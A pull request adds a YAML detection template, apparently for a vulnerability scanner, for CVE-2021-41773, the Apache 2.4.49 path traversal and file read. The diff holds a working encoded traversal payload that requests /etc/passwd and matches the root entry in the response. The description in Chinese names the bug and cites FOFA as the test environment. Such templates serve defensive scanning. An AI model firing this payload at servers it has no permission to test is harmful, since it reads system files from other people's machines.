### PR TITLE
apache-fileread-cve-2021-41773

### DIFF
--- a/pocs/apache-fileread-cve-2021-41773.yml
+++ b/pocs/apache-fileread-cve-2021-41773.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-apache-fileread-cve-2021-41773
+rules:
+  - method: GET
+    path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
apache 2.4.49 文件读取
## 测试环境
fofa：apache 2.4.49
## 备注
